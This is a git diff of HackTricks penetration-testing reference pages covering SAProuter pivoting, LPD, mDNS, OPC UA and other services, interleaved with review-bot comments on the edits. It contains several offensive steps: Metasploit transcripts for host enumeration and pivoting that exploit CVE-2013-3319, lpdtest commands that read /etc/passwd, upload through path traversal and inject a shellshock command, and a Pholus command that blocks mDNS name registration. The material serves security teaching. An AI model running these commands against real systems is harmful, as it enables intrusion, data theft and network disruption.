Warning: Service info could be inaccurate - -Portscan Results -================ - - Host Port State Info - ---- ---- ----- ---- - 192.168.1.1 3201 open SAP Dispatcher sapdp01 - 192.168.1.1 80 open - -[*] Auxiliary module execution completed ``` -From the output and the previous information we now know that the ACL is something like this: +**Blind Enumeration of Internal Hosts** -* Allow TCP connections from any host to 192.168.1.1 to port 80 -* Allow TCP connections from any host to 192.168.1.18 to port 80 -* Allow TCP connections from any host to 192.168.1.1 to port 3201 -* Allow TCP connections from any host to 192.168.1.18 to port 3201 -* Allow SAP connections from any host to 192.168.1.18 to port 3200 +In scenarios where direct information from the SAProuter is limited, techniques like blind enumeration can be applied. This approach attempts to guess and verify the existence of internal hostnames, revealing potential targets without direct IP addresses. -**Blind enumeration of internal hosts** +**Leveraging Information for Penetration Testing** -If you recall, we started by obtaining information from the saprouter which allowed us to know the IP address on an internal host, and we went on from there. But what if the saprouter doesn't provide us with that information? - -One option is to just start scanning private address spaces, and see what happens. The other is to blindly enumerate hosts by hostname. - -Saprouters are able to resolve hostnames we request it to connect to. Saprouter is also kind enough to let us know what are the errors when it fails to connect \(you can actually see the raw responses by uncommenting line 242 on the module source\). - -With this feature we are able to enumerate internal hosts by hostname, and try to go directly for the gold! - -For this, we need to set the RESOLVE option to “remote”. 
In this case, the module will request connection to the TARGETS defined, without resolving them locally, and we can try to guess the internal hosts, and eventually connect to them without ever knowing their IP addresses. - -Important things to remember when blindly enumerating hosts: - -* Set VERBOSE to true; -* We'll get more information from saprouter if MODE is set to SAP\_PROTO; -* It is enough to set only one port to scan, since we're only interested at this point in the information sent by the saprouter \(try 3200\); -* Results will vary depending on the configured ACL. Unfortunately blocked connections won't give us much info. - -In this example we'll try the hostnames sap, sapsrv and sapsrv2. +Having mapped the network and identified accessible services, penetration testers can utilize Metasploit's proxy capabilities to pivot through the SAProuter for further exploration and exploitation of internal SAP services. ```text -msf auxiliary(sap_router_portscanner) > set RESOLVE remote -RESOLVE => remote -msf auxiliary(sap_router_portscanner) > set MODE SAP_PROTO -MODE => SAP_PROTO -msf auxiliary(sap_router_portscanner) > set VERBOSE true -VERBOSE => true -msf auxiliary(sap_router_portscanner) > set TARGETS sap,sapsrv,sapsrv2 -TARGETS => sap,sapsrv,sapsrv2 -msf auxiliary(sap_router_portscanner) > set PORTS 3200 -PORTS => 3200 -msf auxiliary(sap_router_portscanner) > run - -[*] Scanning sap -[-] sap:3200 - unknown host -[!] Warning: Service info could be inaccurate -[*] Scanning sapsrv -[-] sapsrv:3200 - host unreachable -[!] Warning: Service info could be inaccurate -[*] Scanning sapsrv2 -[+] sapsrv2:3200 - TCP OPEN -[!] 
Warning: Service info could be inaccurate - -Portscan Results -================ - - Host Port State Info - ---- ---- ----- ---- - sapsrv2 3200 open SAP Dispatcher sapdp00 - -[*] Auxiliary module execution completed -``` - -From the output we see that the host “sap” does not exist, but that host sapsrv does, although it is unreachable, and sapsrv2 exists and we can connect to port 3200. - -This technique can also be used to try to find other hosts on the network, not SAP related, just try using common hostnames, like smtp, exchange, pdc, bdc, fileshare, intranet, or what other nice hostnames you might have on your bag of tricks - -**The last mile** - -Now that we have obtained all this information, we know the internal hosts available, what services are allowed, and what protocols we can use to pierce the saprouter, we can actually connect to internal servers, and proceed with our pentest. - -Metasploit provides us with an awesome way to saprouter as a proxy, using the Proxies option, thanks to Dave Hartley \([@nmonkee](http://twitter.com/nmonkee)\). - -So at this point, we want to start gathering information on the internal sap server we have discovered in host 192.168.1.18. As an example, we'll be using the module [`sap_hostctrl_getcomputersystem`](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem) which exploits CVE-2013-3319 and give us details on the OS the server is running on by querying the SAP Host Control service on port 1128 via an unauthenticated SOAP request. 
We'll be pivoting through the saprouter, using the proxy support in metasploit: - -![](https://blog.rapid7.com/content/images/post-images/33923/image2.jpg) - -```text -msf auxiliary(sap_router_portscanner) > use auxiliary/scanner/sap/sap_hostctrl_getcomputersystem msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299 -Proxies => sapni:1.2.3.101:3299 msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18 -RHOSTS => 192.168.1.18 msf auxiliary(sap_hostctrl_getcomputersystem) > run - -[+] 192.168.1.18:1128 - Information retrieved successfully -[*] 192.168.1.18:1128 - Response stored in /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_386124.xml (XML) and /Users/msfusr/.msf4/loot/20140107180827_default_192.168.1.18_sap.getcomputers_186948.txt (TXT) -[*] Scanned 1 of 1 hosts (100% complete) -[*] Auxiliary module execution completed ``` -If all went well, you'll have a nice output of the module in the loot containing interesting internal information from the target SAP host \(such as internal usernames you can then try to brute force \). - -Pivoting can \(and should!\) be used to run other modules against internal hosts, not only SAP systems! - **Conclusion** -We've seen how it is possible to exploit weak saprouter configurations that can allow access to internal hosts all the way from the Internet, all this using only metasploit's support for pentesting SAP systems. +This approach underscores the importance of secure SAProuter configurations and highlights the potential for accessing internal networks through targeted penetration testing. Properly securing SAP routers and understanding their role in network security architecture is crucial for protecting against unauthorized access. -I hope this article can help shed light on both the risks associated with saprouter deployments, as well as SAP security in general. 
+For more detailed information on Metasploit modules and their usage, visit [Rapid7's database](http://www.rapid7.com/db). -**References** -* [http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/](http://labs.mwrinfosecurity.com/blog/2012/09/13/sap-smashing-internet-windows/) -* \[[http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2](http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2) - Mariano Nun ez Di Croce - SAProuter .pdf\]\([http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2](http://conference.hitb.org/hitbsecconf2010ams/materials/D2T2) - Mariano Nunez Di Croce - SAProuter .pdf\) -* [http://scn.sap.com/docs/DOC-17124](http://scn.sap.com/docs/DOC-17124) -* [http://help.sap.com/saphelp\_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/f rameset.htm](http://help.sap.com/saphelp_nw70/helpdata/EN/4f/992dfe446d11d189700000e8322d00/frameset.htm) -* [http://help.sap.com/saphelp\_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767 /content.htm](http://help.sap.com/saphelp_dimp50/helpdata/En/f8/bb960899d743378ccb8372215bb767/content.htm) -* [http://labs.integrity.pt/advisories/cve-2013-3319/](http://labs.integrity.pt/advisories/cve-2013-3319/) -* [SAP Service Discovery \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_service_discovery) -* [SAPRouter Admin Request \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_info_request) -* [CVE-2013-3319 SAP Host Agent Information Disclosure \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem) -* [SAPRouter Port Scanner \| Rapid7](http://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_router_portscanner) +## **References** -# Shodan +* [https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/](https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/) + +## Shodan * `port:3299 !HTTP Network packet too big` 
diff --git a/network-services-pentesting/3632-pentesting-distcc.md b/network-services-pentesting/3632-pentesting-distcc.md index 52169c4d5..3984eba99 100644 --- a/network-services-pentesting/3632-pentesting-distcc.md +++ b/network-services-pentesting/3632-pentesting-distcc.md @@ -17,7 +17,7 @@ Other ways to support HackTricks: # Basic Information -Distcc is designed to speed up compilation by taking advantage of unused processing power on other computers. A machine with distcc installed can send code to be compiled across the network to a computer which has the distccd daemon and a compatible compiler installed +**Distcc** is a tool that enhances the **compilation process** by utilizing the **idle processing power** of other computers in the network. When **distcc** is set up on a machine, this machine is capable of distributing its **compilation tasks** to another system. This recipient system must be running the **distccd daemon** and must have a **compatible compiler** installed to process the sent code. **Default port:** 3632 diff --git a/network-services-pentesting/3690-pentesting-subversion-svn-server.md b/network-services-pentesting/3690-pentesting-subversion-svn-server.md index 5912010ce..41c5b0f7d 100644 --- a/network-services-pentesting/3690-pentesting-subversion-svn-server.md +++ b/network-services-pentesting/3690-pentesting-subversion-svn-server.md 
@@ -17,8 +17,7 @@ Other ways to support HackTricks: # Basic Information -Subversion is one of many version control options available today. It's often abbreviated as SVN.\ -Subversion is used for maintaining current and historical versions of projects. Subversion is an open source centralized version control system. It's licensed under Apache. It's also referred to as a software version and revisioning control system. +**Subversion** is a centralized **version control system** that plays a crucial role in managing both the present and historical data of projects. Being an **open source** tool, it operates under the **Apache license**. This system is widely acknowledged for its capabilities in **software versioning and revision control**, ensuring that users can keep track of changes over time efficiently. **Default port:** 3690 diff --git a/network-services-pentesting/3702-udp-pentesting-ws-discovery.md b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md index 2ba5c5bf9..72254df3e 100644 --- a/network-services-pentesting/3702-udp-pentesting-ws-discovery.md +++ b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md 
@@ -17,16 +17,12 @@ Other ways to support HackTricks: # Basic Information -The Web Services Dynamic Discovery Protocol (WS-Discovery) is a multicast discovery protocol that locates services on a local network. +The **Web Services Dynamic Discovery Protocol (WS-Discovery)** is identified as a protocol designed for the discovery of services within a local network through multicast. It facilitates the interaction between **Target Services** and **Clients**. Target Services are endpoints available for discovery, while Clients are the ones actively searching for these services. Communication is established using **SOAP queries over UDP**, directed to the multicast address **239.255.255.250** and UDP port **3702**. -In WS-Discovery terminology, a Target Service is an endpoint that makes itself available for discovery, whereas a Client is an endpoint that searches for Target Services. Both use SOAP queries over UDP to the 239.255.255.250 multicast address with the destination UDP port 3702. +Upon joining a network, a Target Service announces its presence by broadcasting a **multicast Hello**. It remains open to receiving **multicast Probes** from Clients that are on the lookout for services by Type, an identifier unique to the endpoint (e.g., **NetworkVideoTransmitter** for an IP camera). In response to a matching Probe, a Target Service may send a **unicast Probe Match**. Similarly, a Target Service could receive a **multicast Resolve** aimed at identifying a service by name, to which it may reply with a **unicast Resolve Match** if it is the intended target. In the event of leaving the network, a Target Service attempts to broadcast a **multicast Bye**, signaling its departure. ![](<../.gitbook/assets/image (633).png>) -A Target Service sends a multicast Hello 1 when it joins a network. The Target Service can receive a multicast Probe 2, a message sent by a Client searching for a Target Service by Type, at any time. The Type is an identifier for the endpoint. 
For example, an IP camera could have NetworkVideoTransmitter as a Type. It might also send a unicast Probe Match3 if the Target Service matches a Probe (other matching Target Services might also send unicast Probe Matches). Similarly, a Target Service might receive a multicast Resolve4 at any time, a message sent by a - -Client searching for a Target by name, and send a unicast Resolve Match5 if it’s the target of a Resolve. Finally, when a Target Service leaves a network, it makes an effort to send a multicast Bye 6. - **Default port**: 3702 ``` diff --git a/network-services-pentesting/4786-cisco-smart-install.md b/network-services-pentesting/4786-cisco-smart-install.md index 6672c4f22..9d33165e7 100644 --- a/network-services-pentesting/4786-cisco-smart-install.md +++ b/network-services-pentesting/4786-cisco-smart-install.md 
@@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
@@ -47,9 +47,6 @@ The address of the target switch is **10.10.100.10 and CSI is active.** Load SIE The switch configuration **10.10.100.10** will be in the **tftp/** folder -\ - -
@@ -59,7 +56,7 @@ The switch configuration **10.10.100.10** will be in the **tftp/** folder * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/4840-pentesting-opc-ua.md b/network-services-pentesting/4840-pentesting-opc-ua.md index de4cfb7eb..9bbaa264f 100644 --- a/network-services-pentesting/4840-pentesting-opc-ua.md +++ b/network-services-pentesting/4840-pentesting-opc-ua.md @@ -16,11 +16,9 @@ Other ways to support HackTricks: ## Basic Information -OPC UA stands for Open Platform Communications Unified Access. It is a long-standing open-source protocol for data exchange, telemetry collection, and control of industrial equipment. It is very widely used in industrial settings including Manufacturing, Energy, Aerospace, and Defence. It is the only standardized way of communicating with PLCs and allows the equipment of different vendors to communicate with each other. +**OPC UA**, standing for **Open Platform Communications Unified Access**, is a crucial open-source protocol used in various industries like Manufacturing, Energy, Aerospace, and Defence for data exchange and equipment control. It uniquely enables different vendors' equipment to communicate, especially with PLCs. -OPC UA is very flexible in terms of configuration. It can be configured to be extremely secure, or insecure. Many times the security features are disabled to allow communication with older devices. Testing the configuration for weaknesses can therefore reveal easy entry to critical systems. - -Network scanners do not recognize OPC UA, thus discovery may require some work if nonstandard ports are used. +Its configuration allows for strong security measures, but often, for compatibility with older devices, these are lessened, exposing systems to risks. Additionally, finding OPC UA services can be tricky since network scanners might not detect them if they're on nonstandard ports. **Default port:** 4840 
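Review bot: the expansion in the new `**OPC UA**, standing for **Open Platform Communications Unified Access**` line is wrong, in the old text as well as the new: the UA is Unified Architecture (OPC Unified Architecture, the OPC Foundation specification), so correct it while the line is being rewritten. "open-source protocol" should likewise read "open standard", since OPC UA is a published specification rather than a code base. The sentence "It uniquely enables different vendors' equipment to communicate, especially with PLCs" is vaguer than the one it replaces; state plainly that it is a vendor-neutral standard for communicating with PLCs and other industrial equipment.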
@@ -39,8 +37,6 @@ opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port ### Exploiting vulnerabilities -**⚠️ Warning ⚠️**: Poking around without knowing what you are doing may cause serious health hazards to people and monetary losses to your client - If authentication bypass vulnerabilities are found, you can configure an [OPC UA client](https://www.prosysopc.com/products/opc-ua-browser/) accordingly and see what you can access. This may allow anything from merely reading process values to actually operating heavy-duty industrial equipment. To get a clue of the device you have access to, read the "ServerStatus" node values in the address space and google for a usage manual. @@ -51,7 +47,7 @@ To get a clue of the device you have access to, read the "ServerStatus" node val ## References -* https://opalopc.com/how-to-hack-opc-ua/ +* [https://opalopc.com/how-to-hack-opc-ua/](https://opalopc.com/how-to-hack-opc-ua/)
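Review bot: this hunk deletes the `**⚠️ Warning ⚠️**: Poking around without knowing what you are doing may cause serious health hazards to people and monetary losses to your client` line without any replacement. On a page that goes on to say access "may allow anything from merely reading process values to actually operating heavy-duty industrial equipment", that note is substantive guidance for an OPC UA assessment rather than boilerplate; keep it (reworded if the style pass requires) directly above the "If authentication bypass vulnerabilities are found" paragraph.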
diff --git a/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md b/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md index 058d30dc9..8af234041 100644 --- a/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md +++ b/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md @@ -14,22 +14,30 @@ Other ways to support HackTricks:
+### **Introduction to LPD Protocol** -The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 80s (later specified by RFC1179).\ -The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a **control file** defining job/username and a **data file** containing the actual data to be printed. The **input type** of the data file can be set in the control file by choosing among **various file formats**. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy **malicious PostScript** or **PJL print jobs**. +In the 1980s, the **Line Printer Daemon (LPD) protocol** was developed in Berkeley Unix, which later became formalized through RFC1179. This protocol operates over port 515/tcp, allowing interactions through the `lpr` command. The essence of printing via LPD involves sending a **control file** (to specify job details and user) along with a **data file** (which holds the print information). While the control file allows the selection of **various file formats** for the data file, the handling of these files is determined by the specific LPD implementation. A widely recognized implementation for Unix-like systems is **LPRng**. Notably, the LPD protocol can be exploited to execute **malicious PostScript** or **PJL print jobs**. -The `lpdprint` and `lpdtest` tools are included in [**PRET**](https://github.com/RUB-NDS/PRET)**.** They are a minimalist way to print data directly to an LPD capable printer or download/upload/delete files and more: +### **Tools for Interacting with LPD Printers** -``` +[**PRET**](https://github.com/RUB-NDS/PRET) introduces two essential tools, `lpdprint` and `lpdtest`, offering a straightforward method to interact with LPD-compatible printers. 
These tools enable a range of actions from printing data to manipulating files on the printer, such as downloading, uploading, or deleting: + +```python +# To print a file to an LPD printer lpdprint.py hostname filename +# To get a file from the printer lpdtest.py hostname get /etc/passwd +# To upload a file to the printer lpdtest.py hostname put ../../etc/passwd +# To remove a file from the printer lpdtest.py hostname rm /some/file/on/printer +# To execute a command injection on the printer lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' +# To send a mail through the printer lpdtest.py hostname mail lpdtest@mailhost.local ``` -If you want to learn more about [**hacking printers read this page**](pentesting-printers/). +For individuals interested in further exploring the realm of **printer hacking**, a comprehensive resource can be found here: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). # Shodan diff --git a/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/network-services-pentesting/5353-udp-multicast-dns-mdns.md index 325784533..2cf758f36 100644 --- a/network-services-pentesting/5353-udp-multicast-dns-mdns.md +++ b/network-services-pentesting/5353-udp-multicast-dns-mdns.md @@ -14,83 +14,58 @@ Other ways to support HackTricks:
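Review bot: in 515-pentesting-line-printer-daemon-lpd.md the fence is retagged ```` ```python ```` but the block holds shell invocations (`lpdprint.py hostname filename`, `lpdtest.py hostname get /etc/passwd`), so the tag should be `bash`; the added `#` comments read as shell comments either way. Two more points in the same hunk: "the LPD protocol can be exploited to execute malicious PostScript or PJL print jobs" misstates the removed sentence, since LPD only carries the job to the printer's interpreter, so keep the "used as a carrier to deploy" wording; and the in-repo cross-reference `(pentesting-printers/)` is swapped for an external link to hacking-printers.net, which drops the internal page from the navigation; keep the internal link and add the external one beside it if wanted.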
-## Basic Information +## **Basic Information** -Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isn’t dependent on it. They’re both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras.\ -**Default port:** 5353/UDP +**Multicast DNS (mDNS)** enables **DNS-like operations** within local networks without needing a traditional DNS server. It operates on **UDP port 5353** and allows devices to discover each other and their services, commonly seen in various IoT devices. **DNS Service Discovery (DNS-SD)**, often used alongside mDNS, aids in identifying services available on the network through standard DNS queries. ``` PORT STATE SERVICE 5353/udp open zeroconf ``` -### How mDNS Works +### **Operation of mDNS** -Devices use mDNS when the local network **lacks** a conventional **unicast DNS server**. To resolve a domain name for a local address using mDNS, the device sends a **DNS query for a domain name** ending with **.local** to the **multicast** **address** 224.0.0.251 (for IPv4) or FF02::FB (for IPv6). You can also use mDNS to resolve **global domain names** (non .local ones), but mDNS implementations are supposed to **disable** this behavior by default. mDNS requests and responses use **UDP** and **port 5353** as both the source and destination port. 
+In environments without a standard DNS server, mDNS allows devices to resolve domain names ending in **.local** by querying the multicast address **224.0.0.251** (IPv4) or **FF02::FB** (IPv6). Important aspects of mDNS include a **Time-to-Live (TTL)** value indicating record validity and a **QU bit** distinguishing between unicast and multicast queries. Security-wise, it's crucial for mDNS implementations to verify that the packet's source address aligns with the local subnet. -The mDNS replies contain several important flags, including a **Time-to- Live** (TTL) value that signifies how many seconds the record is valid. Sending a reply with **TTL=0 means that the corresponding record should be cleared**. Another important flag is the QU bit, which denotes whether or not the query is a unicast query. If the **QU bit isn’t set**, the packet is a **multicast** query (QM). Because it’s possible to **receive unicast queries outside of the local link**, secure mDNS implementations should always **check that the source address in the packet matches the local subnet address range**. +### **Functioning of DNS-SD** -### How DNS-SD Works +DNS-SD facilitates the discovery of network services by querying for pointer records (PTR) that map service types to their instances. Services are identified using a **_\.\_tcp or \_\.\_udp** pattern within the **.local** domain, leading to the discovery of corresponding **SRV** and **TXT records** which provide detailed service information. -DNS-SD allows clients to **discover available services on the network**. To use it, clients send standard DNS queries for pointer records (PTR), which map the type of service to a list of names of specific instances of that type of service. +### **Network Exploration** -To request a PTR record, clients use the name form "\.\". The **\** part the **service name** preceded by "\_" (for example, \_ipps, \_printer, or \_ipp) and either **\_tcp or \_udp**. 
The **\** portion is "**.local**".\ -**Responders** then return the PTR records that point to the accompanying **service (SRV)** and **text (TXT) records**. Here is an example of a PTR record: +#### **nmap Usage** -``` - _ipps._tcp.local: type PTR, class IN, test._ipps._tcp.local -``` - -The part of the PTR record to the **left** of the colon is its **name**, and the part on the **right** is the **SRV** **record** to which the PTR record points. The **SRV** record lists the target **host** and **port** where the **service** instance can be reached. For example, the next image shows a "test.\_ipps.\_tcp.local" SRV record in Wireshark in host ubuntu.local and port 8000: - -![](<../.gitbook/assets/image (651) (1) (1) (1) (1).png>) - -Therefore, the **name of the SRV** record is **like** the **PTR** record **preceded** by the **\** name (test in this case). The **TXT** has the **same** **name** as the **SRV** record and contains the information needed when the IP address and port number (contained in the SRV record) for a service aren’t sufficient to identify it. - -## Enumeration - -### nmap +A useful command for scanning the local network for mDNS services is: ```bash -nmap -Pn -sUC -p5353 192.168.1.2 - -Starting Nmap 6.46 (http://nmap.org) at 2015-01-01 10:30 GMT -Nmap scan report for 192.168.1.2 -PORT STATE SERVICE -5353/udp open zeroconf -| dns-service-discovery: -| 9/tcp workstation -| Address=192.168.1.2 -| 22/tcp ssh -| Address=192.168.1.2 -| 22/tcp sftp-ssh -| Address=192.168.1.2 -| 445/tcp smb -| Address=192.168.1.2 +nmap -Pn -sUC -p5353 [target IP address] ``` -### Network Enumeration +This command helps identify open mDNS ports and the services advertised over them. -You can learn a lot about the local network by simply sending mDNS requests and capturing multicast mDNS traffic. 
+#### **Network Enumeration with Pholus** -You can use the tool [**Pholus**](https://github.com/aatlasis/Pholus/) to send a mDNS requests (-rq) on the local network and capture multicast mDNS traffic (for -stimeout 10 seconds): +To actively send mDNS requests and capture traffic, the **Pholus** tool can be utilized as follows: ```bash -sudo python3 pholus3.py eth0 -rq -stimeout 10 +sudo python3 pholus3.py [network interface] -rq -stimeout 10 ``` ## Attacks -### Abusing the mDNS Probing Phase +### **Exploiting mDNS Probing** -When a mDNS responder starts or changes its connectivity, it asks the local network if there is **any resource with the name he plans to use**. If the answer contains the record in question, the probing host **should choose a new name**. If 15 conflicts take place within 10 seconds, the host must then wait at least five seconds before any additional attempt. Additionally, if one minute passes during which the host can’t find an unused name, it reports an error to the user. - -The following command line will prevent any new device to get any new name as it will indicate that **any name is already taken**: +An attack vector involves sending spoofed responses to mDNS probes, suggesting that all potential names are already in use, thus hindering new devices from selecting a unique name. This can be executed using: ```bash -sudo python pholus.py eth0 -afre -stimeout 1000 +sudo python pholus.py [network interface] -afre -stimeout 1000 ``` +This technique effectively blocks new devices from registering their services on the network. + +**In summary**, understanding the workings of mDNS and DNS-SD is crucial for network management and security. Tools like **nmap** and **Pholus** offer valuable insights into local network services, while awareness of potential vulnerabilities helps in safeguarding against attacks. 
+ + ### Spoofing/MitM The most interesting attack you can perform over this service is to perform a **MitM** in the **communication between the client and the real server**. You might be able to obtain sensitive files (MitM the communication with the printer) of even credentials (Windows authentication).\ diff --git a/network-services-pentesting/5439-pentesting-redshift.md b/network-services-pentesting/5439-pentesting-redshift.md index 0867ca553..6fc129284 100644 --- a/network-services-pentesting/5439-pentesting-redshift.md +++ b/network-services-pentesting/5439-pentesting-redshift.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. 
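Review bot: in the mDNS hunk the service-type pattern `**_\.\_tcp or \_\.\_udp**` has lost its placeholder, so the new sentence names no service part at all; write it as `_<service>._tcp.local` / `_<service>._udp.local` (angle brackets escaped for GitBook), matching the removed explanation that the service name is prefixed with `_`. The "Exploiting mDNS Probing" rewrite also drops the probing rules the attack depends on (a host must pick a new name when the answer contains the record, must wait after 15 conflicts within 10 seconds, and reports an error after a minute without a free name), which leaves "suggesting that all potential names are already in use" unexplained; keep that paragraph. The added "**In summary**, understanding the workings of mDNS and DNS-SD is crucial..." paragraph is filler in a reference page and sits oddly between the probing attack and the Spoofing/MitM section; drop it.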
@@ -27,7 +27,7 @@ For more information check: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/554-8554-pentesting-rtsp.md b/network-services-pentesting/554-8554-pentesting-rtsp.md index b003a3168..7d97680e0 100644 --- a/network-services-pentesting/554-8554-pentesting-rtsp.md +++ b/network-services-pentesting/554-8554-pentesting-rtsp.md 
@@ -16,12 +16,12 @@ Other ways to support HackTricks: ## Basic Information +From [wikipedia](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol): + > The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording). > > The transmission of streaming data itself is not a task of RTSP. Most RTSP servers use the Real-time Transport Protocol (RTP) in conjunction with Real-time Control Protocol (RTCP) for media stream delivery. However, some vendors implement proprietary transport protocols. The RTSP server software from RealNetworks, for example, also used RealNetworks' proprietary Real Data Transport (RDT). -From [wikipedia](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol). - **Default ports:** 554,8554 ``` 
